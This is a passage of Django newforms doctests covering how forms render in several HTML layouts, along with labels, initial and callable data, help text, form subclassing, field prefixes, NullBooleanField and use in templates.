<li>First name: <input type="text" name="first_name" value="John" /></li>
<li>Last name: <input type="text" name="last_name" value="Lennon" /></li>
<li>Birthday: <input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></li>
>>> print p.as_p()
<p><ul class="errorlist"><li>(Hidden field hidden_text) This field is required.</li></ul></p>
<p>First name: <input type="text" name="first_name" value="John" /></p>
<p>Last name: <input type="text" name="last_name" value="Lennon" /></p>
<p>Birthday: <input type="text" name="birthday" value="1940-10-9" /><input type="hidden" name="hidden_text" /></p>
A corner case: It's possible for a form to have only HiddenInputs.
>>> class TestForm(Form):
... foo = CharField(widget=HiddenInput)
... bar = CharField(widget=HiddenInput)
>>> p = TestForm(auto_id=False)
>>> print p.as_table()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
>>> print p.as_ul()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
>>> print p.as_p()
<input type="hidden" name="foo" /><input type="hidden" name="bar" />
A Form's fields are displayed in the same order in which they were defined.
>>> class TestForm(Form):
... field1 = CharField()
... field2 = CharField()
... field3 = CharField()
... field4 = CharField()
... field5 = CharField()
... field6 = CharField()
... field7 = CharField()
... field8 = CharField()
... field9 = CharField()
... field10 = CharField()
... field11 = CharField()
... field12 = CharField()
... field13 = CharField()
... field14 = CharField()
>>> p = TestForm(auto_id=False)
>>> print p
<tr><th>Field1:</th><td><input type="text" name="field1" /></td></tr>
<tr><th>Field2:</th><td><input type="text" name="field2" /></td></tr>
<tr><th>Field3:</th><td><input type="text" name="field3" /></td></tr>
<tr><th>Field4:</th><td><input type="text" name="field4" /></td></tr>
<tr><th>Field5:</th><td><input type="text" name="field5" /></td></tr>
<tr><th>Field6:</th><td><input type="text" name="field6" /></td></tr>
<tr><th>Field7:</th><td><input type="text" name="field7" /></td></tr>
<tr><th>Field8:</th><td><input type="text" name="field8" /></td></tr>
<tr><th>Field9:</th><td><input type="text" name="field9" /></td></tr>
<tr><th>Field10:</th><td><input type="text" name="field10" /></td></tr>
<tr><th>Field11:</th><td><input type="text" name="field11" /></td></tr>
<tr><th>Field12:</th><td><input type="text" name="field12" /></td></tr>
<tr><th>Field13:</th><td><input type="text" name="field13" /></td></tr>
<tr><th>Field14:</th><td><input type="text" name="field14" /></td></tr>
Some Field classes have an effect on the HTML attributes of their associated
Widget. If you set max_length in a CharField and its associated widget is
either a TextInput or PasswordInput, then the widget's rendered HTML will
include the "maxlength" attribute.
>>> class UserRegistration(Form):
... username = CharField(max_length=10) # uses TextInput by default
... password = CharField(max_length=10, widget=PasswordInput)
... realname = CharField(max_length=10, widget=TextInput) # redundantly define widget, just to test
... address = CharField() # no max_length defined here
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" maxlength="10" /></li>
<li>Realname: <input type="text" name="realname" maxlength="10" /></li>
<li>Address: <input type="text" name="address" /></li>
If you specify a custom "attrs" that includes the "maxlength" attribute,
the Field's max_length attribute will override whatever "maxlength" you specify
in "attrs".
>>> class UserRegistration(Form):
... username = CharField(max_length=10, widget=TextInput(attrs={'maxlength': 20}))
... password = CharField(max_length=10, widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" maxlength="10" /></li>
# Specifying labels ###########################################################
You can specify the label for a field by using the 'label' argument to a Field
class. If you don't specify 'label', Django will use the field name with
underscores converted to spaces, and the initial letter capitalized.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='Your username')
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput, label='Password (again)')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Your username: <input type="text" name="username" maxlength="10" /></li>
<li>Password1: <input type="password" name="password1" /></li>
<li>Password (again): <input type="password" name="password2" /></li>
Labels for as_* methods will only end in a colon if they don't end in other
punctuation already.
>>> class Questions(Form):
... q1 = CharField(label='The first question')
... q2 = CharField(label='What is your name?')
... q3 = CharField(label='The answer to life is:')
... q4 = CharField(label='Answer this question!')
... q5 = CharField(label='The last question. Period.')
>>> print Questions(auto_id=False).as_p()
<p>The first question: <input type="text" name="q1" /></p>
<p>What is your name? <input type="text" name="q2" /></p>
<p>The answer to life is: <input type="text" name="q3" /></p>
<p>Answer this question! <input type="text" name="q4" /></p>
<p>The last question. Period. <input type="text" name="q5" /></p>
>>> print Questions().as_p()
<p><label for="id_q1">The first question:</label> <input type="text" name="q1" id="id_q1" /></p>
<p><label for="id_q2">What is your name?</label> <input type="text" name="q2" id="id_q2" /></p>
<p><label for="id_q3">The answer to life is:</label> <input type="text" name="q3" id="id_q3" /></p>
<p><label for="id_q4">Answer this question!</label> <input type="text" name="q4" id="id_q4" /></p>
<p><label for="id_q5">The last question. Period.</label> <input type="text" name="q5" id="id_q5" /></p>
A label can be a Unicode object or a bytestring with special characters.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='ŠĐĆŽćžšđ')
... password = CharField(widget=PasswordInput, label=u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111')
>>> p = UserRegistration(auto_id=False)
>>> p.as_ul()
u'<li>\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111: <input type="text" name="username" maxlength="10" /></li>\n<li>\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111: <input type="password" name="password" /></li>'
If a label is set to the empty string for a field, that field won't get a label.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label='')
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li> <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(auto_id='id_%s')
>>> print p.as_ul()
<li> <input id="id_username" type="text" name="username" maxlength="10" /></li>
<li><label for="id_password">Password:</label> <input type="password" name="password" id="id_password" /></li>
If label is None, Django will auto-create the label from the field name. This
is default behavior.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, label=None)
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(auto_id='id_%s')
>>> print p.as_ul()
<li><label for="id_username">Username:</label> <input id="id_username" type="text" name="username" maxlength="10" /></li>
<li><label for="id_password">Password:</label> <input type="password" name="password" id="id_password" /></li>
# Initial data ################################################################
You can specify initial data for a field by using the 'initial' argument to a
Field class. This initial data is displayed when a Form is rendered with *no*
data. It is not displayed when a Form is rendered with any data (including an
empty dictionary). Also, the initial value is *not* used if data for a
particular required field isn't provided.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial='django')
... password = CharField(widget=PasswordInput)
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
Here, we're submitting data, so the initial value will *not* be displayed.
>>> p = UserRegistration({}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
An 'initial' value is *not* used as a fallback if data is not provided. In this
example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
# Dynamic initial data ########################################################
The previous technique dealt with "hard-coded" initial data, but it's also
possible to specify initial data after you've already created the Form class
(i.e., at runtime). Use the 'initial' parameter to the Form constructor. This
should be a dictionary containing initial values for one or more fields in the
form, keyed by field name.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(initial={'username': 'stephane'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="stephane" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
The 'initial' parameter is meaningless if you pass data.
>>> p = UserRegistration({}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, initial={'username': 'django'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
A dynamic 'initial' value is *not* used as a fallback if data is not provided.
In this example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'}, initial={'username': 'django'})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
If a Form defines 'initial' *and* 'initial' is passed as a parameter to Form(),
then the latter will get precedence.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial='django')
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(initial={'username': 'babik'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="babik" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
# Callable initial data ########################################################
The previous technique dealt with raw values as initial data, but it's also
possible to specify callable data.
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
We need to define functions that get called later.
>>> def initial_django():
... return 'django'
>>> def initial_stephane():
... return 'stephane'
Here, we're not submitting any data, so the initial value will be displayed.
>>> p = UserRegistration(initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
The 'initial' parameter is meaningless if you pass data.
>>> p = UserRegistration({}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u''}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul>Username: <input type="text" name="username" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration({'username': u'foo'}, initial={'username': initial_django}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /></li>
A callable 'initial' value is *not* used as a fallback if data is not provided.
In this example, we don't provide a value for 'username', and the form raises a
validation error rather than using the initial value for 'username'.
>>> p = UserRegistration({'password': 'secret'}, initial={'username': initial_django})
>>> p.errors
{'username': [u'This field is required.']}
>>> p.is_valid()
False
If a Form defines 'initial' *and* 'initial' is passed as a parameter to Form(),
then the latter will get precedence.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, initial=initial_django)
... password = CharField(widget=PasswordInput)
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="django" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
>>> p = UserRegistration(initial={'username': initial_stephane}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="stephane" maxlength="10" /></li>
<li>Password: <input type="password" name="password" /></li>
# Help text ###################################################################
You can specify descriptive text for a field by using the 'help_text' argument
to a Field class. This help text is displayed when a Form is rendered.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='e.g., user@example.com')
... password = CharField(widget=PasswordInput, help_text='Choose wisely.')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</li>
<li>Password: <input type="password" name="password" /> Choose wisely.</li>
>>> print p.as_p()
<p>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</p>
<p>Password: <input type="password" name="password" /> Choose wisely.</p>
>>> print p.as_table()
<tr><th>Username:</th><td><input type="text" name="username" maxlength="10" /><br />e.g., user@example.com</td></tr>
<tr><th>Password:</th><td><input type="password" name="password" /><br />Choose wisely.</td></tr>
The help text is displayed whether or not data is provided for the form.
>>> p = UserRegistration({'username': u'foo'}, auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" value="foo" maxlength="10" /> e.g., user@example.com</li>
<li><ul class="errorlist"><li>This field is required.</li></ul>Password: <input type="password" name="password" /> Choose wisely.</li>
help_text is not displayed for hidden fields. It can be used for documentation
purposes, though.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='e.g., user@example.com')
... password = CharField(widget=PasswordInput)
... next = CharField(widget=HiddenInput, initial='/', help_text='Redirect destination')
>>> p = UserRegistration(auto_id=False)
>>> print p.as_ul()
<li>Username: <input type="text" name="username" maxlength="10" /> e.g., user@example.com</li>
<li>Password: <input type="password" name="password" /><input type="hidden" name="next" value="/" /></li>
Help text can include arbitrary Unicode characters.
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text='ŠĐĆŽćžšđ')
>>> p = UserRegistration(auto_id=False)
>>> p.as_ul()
u'<li>Username: <input type="text" name="username" maxlength="10" /> \u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</li>'
# Subclassing forms ###########################################################
You can subclass a Form to add fields. The resulting form subclass will have
all of the fields of the parent Form, plus whichever fields you define in the
subclass.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> class Musician(Person):
... instrument = CharField()
>>> p = Person(auto_id=False)
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
>>> m = Musician(auto_id=False)
>>> print m.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
<li>Instrument: <input type="text" name="instrument" /></li>
Yes, you can subclass multiple forms. The fields are added in the order in
which the parent classes are listed.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> class Instrument(Form):
... instrument = CharField()
>>> class Beatle(Person, Instrument):
... haircut_type = CharField()
>>> b = Beatle(auto_id=False)
>>> print b.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
<li>Instrument: <input type="text" name="instrument" /></li>
<li>Haircut type: <input type="text" name="haircut_type" /></li>
# Forms with prefixes #########################################################
Sometimes it's necessary to have multiple forms display on the same HTML page,
or multiple copies of the same form. We can accomplish this with form prefixes.
Pass the keyword argument 'prefix' to the Form constructor to use this feature.
This value will be prepended to each HTML form field name. One way to think
about this is "namespaces for HTML forms". Notice that in the data argument,
each field's key has the prefix, in this case 'person1', prepended to the
actual field name.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
>>> data = {
... 'person1-first_name': u'John',
... 'person1-last_name': u'Lennon',
... 'person1-birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='person1')
>>> print p.as_ul()
<li><label for="id_person1-first_name">First name:</label> <input type="text" name="person1-first_name" value="John" id="id_person1-first_name" /></li>
<li><label for="id_person1-last_name">Last name:</label> <input type="text" name="person1-last_name" value="Lennon" id="id_person1-last_name" /></li>
<li><label for="id_person1-birthday">Birthday:</label> <input type="text" name="person1-birthday" value="1940-10-9" id="id_person1-birthday" /></li>
>>> print p['first_name']
<input type="text" name="person1-first_name" value="John" id="id_person1-first_name" />
>>> print p['last_name']
<input type="text" name="person1-last_name" value="Lennon" id="id_person1-last_name" />
>>> print p['birthday']
<input type="text" name="person1-birthday" value="1940-10-9" id="id_person1-birthday" />
>>> p.errors
{}
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
Let's try submitting some bad data to make sure form.errors and field.errors
work as expected.
>>> data = {
... 'person1-first_name': u'',
... 'person1-last_name': u'',
... 'person1-birthday': u''
... }
>>> p = Person(data, prefix='person1')
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p['first_name'].errors
[u'This field is required.']
>>> p['person1-first_name'].errors
Traceback (most recent call last):
...
KeyError: "Key 'person1-first_name' not found in Form"
In this example, the data doesn't have a prefix, but the form requires it, so
the form doesn't "see" the fields.
>>> data = {
... 'first_name': u'John',
... 'last_name': u'Lennon',
... 'birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='person1')
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
With prefixes, a single data dictionary can hold data for multiple instances
of the same form.
>>> data = {
... 'person1-first_name': u'John',
... 'person1-last_name': u'Lennon',
... 'person1-birthday': u'1940-10-9',
... 'person2-first_name': u'Jim',
... 'person2-last_name': u'Morrison',
... 'person2-birthday': u'1943-12-8'
... }
>>> p1 = Person(data, prefix='person1')
>>> p1.is_valid()
True
>>> p1.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
>>> p2 = Person(data, prefix='person2')
>>> p2.is_valid()
True
>>> p2.cleaned_data
{'first_name': u'Jim', 'last_name': u'Morrison', 'birthday': datetime.date(1943, 12, 8)}
By default, forms append a hyphen between the prefix and the field name, but a
form can alter that behavior by implementing the add_prefix() method. This
method takes a field name and returns the prefixed field, according to
self.prefix.
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
... def add_prefix(self, field_name):
... return self.prefix and '%s-prefix-%s' % (self.prefix, field_name) or field_name
>>> p = Person(prefix='foo')
>>> print p.as_ul()
<li><label for="id_foo-prefix-first_name">First name:</label> <input type="text" name="foo-prefix-first_name" id="id_foo-prefix-first_name" /></li>
<li><label for="id_foo-prefix-last_name">Last name:</label> <input type="text" name="foo-prefix-last_name" id="id_foo-prefix-last_name" /></li>
<li><label for="id_foo-prefix-birthday">Birthday:</label> <input type="text" name="foo-prefix-birthday" id="id_foo-prefix-birthday" /></li>
>>> data = {
... 'foo-prefix-first_name': u'John',
... 'foo-prefix-last_name': u'Lennon',
... 'foo-prefix-birthday': u'1940-10-9'
... }
>>> p = Person(data, prefix='foo')
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
# Forms with NullBooleanFields ################################################
NullBooleanField is a bit of a special case because its presentation (widget)
is different than its data. This is handled transparently, though.
>>> class Person(Form):
... name = CharField()
... is_cool = NullBooleanField()
>>> p = Person({'name': u'Joe'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'1'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'2'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': u'3'}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': True}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> p = Person({'name': u'Joe', 'is_cool': False}, auto_id=False)
>>> print p['is_cool']
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
# Basic form processing in a view #############################################
>>> from django.template import Template, Context
>>> class UserRegistration(Form):
... username = CharField(max_length=10)
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
>>> def my_function(method, post_data):
... if method == 'POST':
... form = UserRegistration(post_data, auto_id=False)
... else:
... form = UserRegistration(auto_id=False)
... if form.is_valid():
... return 'VALID: %r' % form.cleaned_data
... t = Template('<form action="" method="post">\n<table>\n{{ form }}\n</table>\n<input type="submit" />\n</form>')
... return t.render(Context({'form': form}))
Case 1: GET (an empty form, with no errors).
>>> print my_function('GET', {})
<form action="" method="post">
<table>
<tr><th>Username:</th><td><input type="text" name="username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" /></td></tr>
</table>
<input type="submit" />
</form>
Case 2: POST with erroneous data (a redisplayed form, with errors).
>>> print my_function('POST', {'username': 'this-is-a-long-username', 'password1': 'foo', 'password2': 'bar'})
<form action="" method="post">
<table>
<tr><td colspan="2"><ul class="errorlist"><li>Please make sure your passwords match.</li></ul></td></tr>
<tr><th>Username:</th><td><ul class="errorlist"><li>Ensure this value has at most 10 characters.</li></ul><input type="text" name="username" value="this-is-a-long-username" maxlength="10" /></td></tr>
<tr><th>Password1:</th><td><input type="password" name="password1" value="foo" /></td></tr>
<tr><th>Password2:</th><td><input type="password" name="password2" value="bar" /></td></tr>
</table>
<input type="submit" />
</form>
Case 3: POST with valid data (the success message).
>>> print my_function('POST', {'username': 'adrian', 'password1': 'secret', 'password2': 'secret'})
VALID: {'username': u'adrian', 'password1': u'secret', 'password2': u'secret'}
# Some ideas for using templates with forms ###################################
>>> class UserRegistration(Form):
... username = CharField(max_length=10, help_text="Good luck picking a username that doesn't already exist.")
... password1 = CharField(widget=PasswordInput)
... password2 = CharField(widget=PasswordInput)
... def clean(self):
... if self.cleaned_data.get('password1') and self.cleaned_data.get('password2') and self.cleaned_data['password1'] != self.cleaned_data['password2']:
... raise ValidationError(u'Please make sure your passwords match.')
... return self.cleaned_data
You have full flexibility in displaying form fields in a template. Just pass a
Form instance to the template, and use "dot" access to refer to individual
fields. Note, however, that this flexibility comes with the responsibility of
displaying all the errors, including any that might not be associated with a
particular field.
>>> t = Template('''<form action="">
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" /></label></p>
<p><label>Password (again): <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
>>> print t.render(Context({'form': UserRegistration({'username': 'django'}, auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<ul class="errorlist"><li>This field is required.</li></ul><p><label>Password: <input type="password" name="password1" /></label></p>
<ul class="errorlist"><li>This field is required.</li></ul><p><label>Password (again): <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
Use form.[field].label to output a field's label. You can specify the label for
a field by using the 'label' argument to a Field class. If you don't specify
'label', Django will use the field name with underscores converted to spaces,
and the initial letter capitalized.
>>> t = Template('''<form action="">
... <p><label>{{ form.username.label }}: {{ form.username }}</label></p>
... <p><label>{{ form.password1.label }}: {{ form.password1 }}</label></p>
... <p><label>{{ form.password2.label }}: {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p><label>Username: <input type="text" name="username" maxlength="10" /></label></p>
<p><label>Password1: <input type="password" name="password1" /></label></p>
<p><label>Password2: <input type="password" name="password2" /></label></p>
<input type="submit" />
</form>
User form.[field].label_tag to output a field's label with a <label> tag
wrapped around it, but *only* if the given field has an "id" attribute.
Recall from above that passing the "auto_id" argument to a Form gives each
field an "id" attribute.
>>> t = Template('''<form action="">
... <p>{{ form.username.label_tag }}: {{ form.username }}</p>
... <p>{{ form.password1.label_tag }}: {{ form.password1 }}</p>
... <p>{{ form.password2.label_tag }}: {{ form.password2 }}</p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p>Username: <input type="text" name="username" maxlength="10" /></p>
<p>Password1: <input type="password" name="password1" /></p>
<p>Password2: <input type="password" name="password2" /></p>
<input type="submit" />
</form>
>>> print t.render(Context({'form': UserRegistration(auto_id='id_%s')}))
<form action="">
<p><label for="id_username">Username</label>: <input id="id_username" type="text" name="username" maxlength="10" /></p>
<p><label for="id_password1">Password1</label>: <input type="password" name="password1" id="id_password1" /></p>
<p><label for="id_password2">Password2</label>: <input type="password" name="password2" id="id_password2" /></p>
<input type="submit" />
</form>
User form.[field].help_text to output a field's help text. If the given field
does not have help text, nothing will be output.
>>> t = Template('''<form action="">
... <p>{{ form.username.label_tag }}: {{ form.username }}<br />{{ form.username.help_text }}</p>
... <p>{{ form.password1.label_tag }}: {{ form.password1 }}</p>
... <p>{{ form.password2.label_tag }}: {{ form.password2 }}</p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration(auto_id=False)}))
<form action="">
<p>Username: <input type="text" name="username" maxlength="10" /><br />Good luck picking a username that doesn't already exist.</p>
<p>Password1: <input type="password" name="password1" /></p>
<p>Password2: <input type="password" name="password2" /></p>
<input type="submit" />
</form>
>>> Template('{{ form.password1.help_text }}').render(Context({'form': UserRegistration(auto_id=False)}))
''
The label_tag() method takes an optional attrs argument: a dictionary of HTML
attributes to add to the <label> tag.
>>> f = UserRegistration(auto_id='id_%s')
>>> for bf in f:
... print bf.label_tag(attrs={'class': 'pretty'})
<label for="id_username" class="pretty">Username</label>
<label for="id_password1" class="pretty">Password1</label>
<label for="id_password2" class="pretty">Password2</label>
To display the errors that aren't associated with a particular field -- e.g.,
the errors caused by Form.clean() -- use {{ form.non_field_errors }} in the
template. If used on its own, it is displayed as a <ul> (or an empty string, if
the list of errors is empty). You can also use it in {% if %} statements.
>>> t = Template('''<form action="">
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration({'username': 'django', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)}))
<form action="">
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" value="foo" /></label></p>
<p><label>Password (again): <input type="password" name="password2" value="bar" /></label></p>
<input type="submit" />
</form>
>>> t = Template('''<form action="">
... {{ form.non_field_errors }}
... {{ form.username.errors.as_ul }}<p><label>Your username: {{ form.username }}</label></p>
... {{ form.password1.errors.as_ul }}<p><label>Password: {{ form.password1 }}</label></p>
... {{ form.password2.errors.as_ul }}<p><label>Password (again): {{ form.password2 }}</label></p>
... <input type="submit" />
... </form>''')
>>> print t.render(Context({'form': UserRegistration({'username': 'django', 'password1': 'foo', 'password2': 'bar'}, auto_id=False)}))
<form action="">
<ul class="errorlist"><li>Please make sure your passwords match.</li></ul>
<p><label>Your username: <input type="text" name="username" value="django" maxlength="10" /></label></p>
<p><label>Password: <input type="password" name="password1" value="foo" /></label></p>
<p><label>Password (again): <input type="password" name="password2" value="bar" /></label></p>
<input type="submit" />
</form>
###############
# Extra stuff #
###############
The newforms library comes with some extra, higher-level Field and Widget
classes that demonstrate some of the library's abilities.
# SelectDateWidget ############################################################
>>> from django.newforms.extras import SelectDateWidget
>>> w = SelectDateWidget(years=('2007','2008','2009','2010','2011','2012','2013','2014','2015','2016'))
>>> print w.render('mydate', '')
<select name="mydate_month">
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day">
<option value="1">1</option>
